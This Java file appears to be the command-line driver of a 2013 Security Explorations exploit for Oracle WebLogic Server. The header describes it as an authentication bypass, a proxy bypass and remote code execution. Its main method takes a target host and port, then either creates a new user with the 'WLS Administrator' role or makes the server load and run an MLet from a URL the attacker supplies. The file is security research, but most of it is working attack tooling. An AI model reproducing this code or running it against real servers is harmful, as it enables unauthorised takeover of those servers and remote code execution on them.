/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* Weblogic server                                                            */
/* authentication bypass / OHS proxy bypass / arbitrary remote code execution */

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.lang.reflect.*;
import java.io.*;
import java.net.*;
import java.util.*;
import java.security.*;
import java.security.cert.*;
import javax.net.ssl.*;

public class Remote {
  public static int LINESIZE = 16;

  public static final int CMD_ADD_USER = 1;
  public static final int CMD_RUN_MLET = 2;

  private static String allowed_chars="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890!@#$%^&*()_+-={}[]|:\";',.<>?/";

  private static String dopad(int num) {
   String str="";

   for(int i=0;i<num;i++) {
    str+=" ";
   }

   return str;
  }

  public static String hex_value(int val,int max) {
   String s="";
   for(int i=0;i<max;i++) {
    s+="0";
   }

   s+=Integer.toHexString(val);

   return s.substring(s.length()-max);
  }

  private static String char_value(char c) {
   char tab[]=new char[1];

   if (allowed_chars.indexOf(c)!=-1) {
    tab[0]=c;
    return new String(tab);
   } else return ".";
  }

  private static void print_line(int pad,byte tab[],int pos) throws Throwable {
   String str=dopad(pad)+hex_value(pos,4)+": ";

   int size=tab.length-pos;
   
   if (size>LINESIZE) size=LINESIZE;

   for(int i=pos;i<(pos+size);i++) {
    str+=" "+hex_value((int)tab[i],2);
   }

   str+="  ";  

   for(int i=pos;i<(pos+size);i++) {
    str+=char_value((char)tab[i]);
   }

   System.out.println(str);
  }

  public static void print_buf(int pad,byte tab[]) throws Throwable {
   int pos=0;
  
   while(pos<tab.length) {
   print_line(pad,tab,pos);
    pos+=LINESIZE;
   }
  }

  public static void dump(String s,byte tab[]) throws Throwable {
   System.out.println("["+s+"]");
   print_buf(0,tab);
   System.out.println("");
  }

  public static void usage() {
    System.out.println("usage: Remote hostname port [-s][-p][-d][-o oid][-a user pass][-l mlet_url]");
    System.exit(0);
  }

  public static void error(String s) {
    System.out.println("error: "+s);
    System.exit(0);
  }

  public static void main(String args[]) throws Throwable {
    try {
      if (args.length<3) usage();

      String hostname=args[0];       
      String sport=args[1];       
      int port=-1;

      try {
       port=Integer.parseInt(sport);
      } catch (Exception e) {
       error("invalid port "+sport);          
      }

      boolean ssl=false;
      boolean ohs_proxy=false;
      boolean dump=false;
      int oid=0;
      String user=null;
      String pass=null;
      String mlet_url=null;
      int cmd=0;

      int idx=2;

      while(idx<args.length) {
       String arg=args[idx++];

       if (arg.equals("-s")) {
        ssl=true;
       } else

       if (arg.equals("-p")) {
        ohs_proxy=true;
       } else

       if (arg.equals("-d")) {
        dump=true;
       } else

       if (arg.equals("-o")) {
        try {
         arg=args[idx++];
         oid=Integer.parseInt(arg,0x10);
        } catch (Exception e) {
         error("invalid oid "+arg);          
        }
       } else

       if (arg.equals("-a")) {
        if ((idx>(args.length-2))||(cmd!=0)) usage();
        user=args[idx++];
        pass=args[idx++];
        cmd=CMD_ADD_USER;
       } else

       if (arg.equals("-l")) {
        if ((idx>(args.length-1))||(cmd!=0)) usage();
        mlet_url=args[idx++];
        cmd=CMD_RUN_MLET;
       } else usage();
      }

      if (cmd==0)  error("no command");          

      byte resp[]=null;

      switch(cmd) {
       case CMD_ADD_USER:
        System.out.println("- trying to add user "+user+" on "+hostname+" "+(ohs_proxy ? "(OHS proxy)":""));
        resp=WLS.create_user(hostname,port,ssl,oid,user,pass,"WLS Administrator",ohs_proxy);
        break;
       case CMD_RUN_MLET:
        System.out.println("- trying to execute mlet from "+mlet_url+" on "+hostname+" "+(ohs_proxy ? "(OHS proxy)":""));
        resp=WLS.load_mbean(hostname,port,ssl,oid,"java.lang:Name=SEMBean",mlet_url,ohs_proxy);
        break;
      }

      if (dump&&(resp!=null)) {
       dump("server response",resp);
      }
    } catch (Throwable t) { 
      t.printStackTrace();   
    } 
  }
}
